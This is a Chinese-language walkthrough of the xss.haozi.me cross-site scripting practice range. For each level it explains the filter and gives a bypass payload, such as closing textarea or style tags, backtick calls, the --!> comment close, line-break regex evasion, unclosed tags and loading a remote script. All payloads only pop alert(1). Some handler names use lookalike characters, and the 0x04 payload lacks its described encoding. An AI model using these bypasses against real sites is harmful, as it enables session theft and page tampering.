xss.haozi.me靶机通关

0x00

没有任何过滤可以直接注入<img src=x οnerrοr=alert(1)>

0x01

使用了testarea标签将我们的输入内容以普通的字符串进行展示
但是我们可以将标签进行闭合
</textarea><img src=x οnerrοr=alert(1)>

0x02

我们依然可以先闭合之后添加属性a" οnclick="alert(1)

当我们点击输入框后可以实现弹窗

0x03

我们可以看到它通过热品replace()函数将()替换成了空格
但是在html中我们可以使用``来代替()
<img src=x οnerrοr=alert`1`>

0x04

我们可以看到它将我们的()和``都替换成了空
但是我们可以提前编码
<img src=x οnerrοr=alert(1)>
为什么可以这样写呢？因为解码是有顺序的url>html>js

0x05

可以看到它将我们的的输入进行了注释
但是在html中注释有两种写法和<!-- --!>
所以我们的payload可以这样写：--!><img src=x οnerrοr=alert(1)>

0x06

我们可以看到它将auto和on开头的事件都进行了过滤并忽略了大小写
但是html是支持换行的所以我们可以写成
type=image src=x onerror
=alert(1)
那么不是说将on事件进行了过滤吗？为什么我们依然能使用
你需要看清楚它写的正则是以on或auto开头但是它必须以=号结尾
所以我们就可以利用换行进行绕过

0x07

我们可以看到它的正则写的是以<开始，匹配一个<后面可能跟着一个/或者没有跟/
匹配一个或多个非>字符的字符,匹配>字符
也就是说这个正则可以过滤html中的任意标签
我们可以利用html中的一个特性就是标签不必必须写全我们的html可以自动补齐标签
<img src=1 οnerrοr="alert(1)"

0x08

它将我们的输入放在了style标签中并且将style的闭合做了过滤
但是我们依然可以利用html的特性进行绕过
我们可以使用上面使用过的方法就是换行
也可以使用</style >在结束标签中加一个空格html依然可以执行
</style ><img src=x οnerrοr=alert(1)>

0x09

这串代码的意思是必须要有https?://www.segmentfault.com/
所以我们可以将payload写在后面
https://www.segmentfault.com/sss" οnerrοr="alert(1)

0x0A

我们可以看到他将一些符号进行了过滤所以导致我们没办法使用属性
但是我们可以自己制作一个js文件去让js解析
网站也给我们准备了一个可以访问的文件
https://www.segmentfault.com.haozi.me/j.js

所以我们可以写成这样
https://www.segmentfault.com.haozi.me/j.js